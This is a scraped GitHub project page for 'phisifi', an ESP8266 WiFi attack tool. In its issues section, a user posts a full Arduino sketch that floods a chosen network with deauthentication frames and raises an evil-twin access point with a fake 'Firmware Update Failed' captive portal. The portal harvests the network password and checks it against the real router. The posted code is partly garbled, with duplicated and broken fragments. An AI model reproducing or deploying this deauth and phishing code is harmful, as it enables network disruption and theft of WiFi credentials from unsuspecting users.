p3tr0s / phisifi Goto Github PK
View Code? Open in Web Editor NEWWiFi Hacking with an ESP8266 - Deauth combined with Evil Twin attack
phisifi's People
Contributors
Stargazers
Watchers
Forkers
romnial klatau barzan1981 11tarekahamed0012 hattaz3t misterdax xiv3r behnamakbaribm fantas21 tharkadharshana gabrielmerci lorenzo1205 abey1002 entropydokidokiphisifi's Issues
enhanced deauth which works well on esp8266
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266HTTPClient.h>
extern "C" {
#include "user_interface.h"
}
typedef struct
{
String ssid;
uint8_t ch;
uint8_t bssid[6];
} _Network;
const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);
_Network _networks[16];
_Network _selectedNetwork;
void clearArray() {
for (int i = 0; i < 16; i++) {
_Network _network;
_networks[i] = _network;
}
}
String _correct = "";
String _tryPassword = "";
// Default main strings
#define SUBTITLE "ACCESS POINT RESCUE MODE"
#define TITLE "⚠ Firmware Update Failed"
#define BODY "Your router encountered a problem while automatically installing the latest firmware update.
To revert the old firmware and manually update later, please verify your password."
String header(String t) {
String a = String(_selectedNetwork.ssid);
String CSS = "article { background: #f2f2f2; padding: 1.3em; }"
"body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }"
"div { padding: 0.5em; }"
"h1 { margin: 0.5em 0 0 0; padding: 0.5em; font-size:7vw;}"
"input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }"
"label { color: #333; display: block; font-style: italic; font-weight: bold; }"
"nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }"
"nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } "
"textarea { width: 100%; }"
;
String h = ""
"<title>
"<meta name=viewport content="width=device-width,initial-scale=1">"
"<style>" + CSS + "</style>"
"<meta charset="UTF-8">"
"" + a + " " + SUBTITLE + "
" + t + "
";
return h;
}
return h;
}
String footer() {
return "
© All rights reserved.
";}
String index() {
return header(TITLE) + "
" + BODY + "
WiFi password:" +
"" + footer();
}
⊗
Serial.println("Wrong password tried!");
} else {
_correct = "Successfully got password for: " + _selectedNetwork.ssid + " Password: " + _tryPassword;
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
Serial.println("Good password was entered !");
Serial.println(_correct);
}
}
webServer.send(200, "text/html", _html);
"" + footer();
}
void setup() {
Serial.begin(115200);
WiFi.mode(WIFI_AP_STA);
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
webServer.onNotFound(handleIndex);
webServer.begin();
}
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}
network.ch = WiFi.channel(i);
_networks[i] = network;
}
}
}
bool hotspot_active = false;
bool deauthing_active = false;
void handleResult() {
String html = "";
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
webServer.send(200, "text/html", "<script> setTimeout(function(){window.location.href = '/';}, 4000); </script>
⊗
Wrong Password
Please, try again.
");Serial.println("Wrong password tried!");
} else {
_correct = "Successfully got password for: " + _selectedNetwork.ssid + " Password: " + _tryPassword;
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
Serial.println("Good password was entered !");
Serial.println(_correct);
}
}
String _tempHTML = ""
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"
"
"
";
";"
"
"<button style='display:inline-block;'{disabled}>{deauth_button}"
""
"<button style='display:inline-block;'{disabled}>{hotspot_button}"
"
"<button style='display:inline-block;'{disabled}>{deauth_button}"
""
"<button style='display:inline-block;'{disabled}>{hotspot_button}"
"
";
void handleIndex() {
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
if (hotspot_active == false) {
String _html = _tempHTML;
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
_html += "</table>";
if (_correct != "") {
_html += "</br><h3>" + _correct + "</h3>";
}
_html += "</div></body></html>";
webServer.send(200, "text/html", _html);
} else {
if (webServer.hasArg("password")) {
_tryPassword = webServer.arg("password");
if (webServer.arg("deauth") == "start") {
deauthing_active = false;
}
delay(1000);
WiFi.disconnect();
WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
} else {
webServer.send(200, "text/html", index());
}
}
}
void handleAdmin() {
String _html = _tempHTML;
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "
| SSID | BSSID | Channel | Select |
|---|---|---|---|
| " + _networks[i].ssid + " | " + bytesToStr(_networks[i].bssid, 6) + " | " + String(_networks[i].ch) + " | ";
} if (deauthing_active) { if (hotspot_active) { if (_selectedNetwork.ssid == "") { if (_correct != "") { " + _correct + "";} _html += " |
webServer.send(200, "text/html", _html);
}
String bytesToStr(const uint8_t* b, uint32_t size) {
String str;
const char ZERO = '0';
const char DOUBLEPOINT = ':';
for (uint32_t i = 0; i < size; i++) {
if (b[i] < 0x10) str += ZERO;
str += String(b[i], HEX);
if (i < size - 1) str += DOUBLEPOINT;
}
return str;
}
unsigned long now = 0;
unsigned long wifinow = 0;
unsigned long deauth_now = 0;
bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t wifi_channel) {
Serial.println(wifi_channel);
// Serial.println(bytesToStr(packet, 26));
wifi_set_channel(wifi_channel);
bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
if (sent) Serial.println("done");
return sent;
}
void loop() {
dnsServer.processNextRequest();
webServer.handleClient();
if (deauthing_active && millis() - deauth_now >= 200) {
uint8_t packet[26] = {
0xC0, 0x00,
0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00,
0x01, 0x00
};
bool success = false;
memcpy(&packet[10], _selectedNetwork.bssid, 6);
memcpy(&packet[16], _selectedNetwork.bssid, 6);
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// send disassociate frame
packet[0] = 0xa0;
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// uint8_t* apMac;
// uint8_t reason;
// uint8_t ch;
// apMac = _selectedNetwork.bssid;
// uint8_t stMac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
// reason = 1;
// ch = _selectedNetwork.ch;
// deauthDevice(apMac, stMac, reason, ch);
// uint8_t deauthPacket[26] = {
// /* 0 - 1 */ 0xC0, 0x00, // type, subtype c0: deauth (a0: disassociate)
// /* 2 - 3 */ 0x00, 0x00, // duration (SDK takes care of that)
// /* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
// /* 10 - 15 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // source (ap)
// /* 16 - 21 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // BSSID (ap)
// /* 22 - 23 */ 0x00, 0x00, // fragment & squence number
// /* 24 - 25 */ 0x01, 0x00 // reason code (1 = unspecified reason)
// };
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[packetSize];
// uint8_t broadcast[] = {0x32, 0xAE, 0xA4, 0x07, 0x0D, 0x66};
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthpkt[4], broadcast, 6);
// // memcpy(&deauthpkt[10], _selectedNetwork.bssid, 6);
// // memcpy(&deauthpkt[16], _selectedNetwork.bssid, 6);
// deauthpkt[24] = 1;
// Serial.println(bytesToStr(deauthPacket, 26));
// deauthpkt[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// Serial.println(wifi_send_pkt_freedom(deauthpkt, sizeof(deauthPacket), 0));
// Serial.println(bytesToStr(deauthPacket, 26));
// uint8_t disassocpkt[packetSize];
// memcpy(disassocpkt, deauthpkt, packetSize);
// disassocpkt[0] = 0Xa0;
// Serial.println(wifi_send_pkt_freedom(disassocpkt, sizeof(deauthPacket), 0));
// deauth_now = millis();
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[sizeof(deauthPacket)];
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthPacket[4], broadcast, 6);
// memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
// memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
// uint8_t deauthPacket[24] = 1;
// // send deauth frame
// uint8_t deauthPacket[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
// // send disassociate frame
// // uint8_t disassocpkt[packetSize];
// // memcpy(disassocpkt, deauthPacket, packetSize);
// uint8_t disassocpkt[0] = 0xa0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
deauth_now = millis();
}
if (millis() - now >= 15000) {
performScan();
now = millis();
}
if (millis() - wifinow >= 2000) {
// if (WiFi.status() != WL_CONNECTED) {
// Serial.println("BAD");
// } else {
// Serial.println("GOOD");
// }
wifinow = millis();
}
}
Esp8266 not starting automatically after user entering correct password
Esp8266 not starting automatically after user entering correct password. And when I reconnect esp8266 to power . It's not showing password.. even the default AP' name is different like 'Fairy.......'
Please release the bin file
Bin file can be flashed with mobile. So please release the bin file.
Message to Sign In Not showing
Must find the bin file 😆😆
How can I redo the "wifi" sign to make it more user-friendly?, seems like deauther doesn't work anymore!?...."I use google translate". Everything worked fine 🥹🥹
Ap not show the name who exist in the code
ap shows previous ap name tried full reset including nvm doesnt work
deauthPacket invalid
cant deauth.I think it is invalid.WI-PWN could work.so it doesn't matter with my board.
btw i use VScode to upload. and lib choose well
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.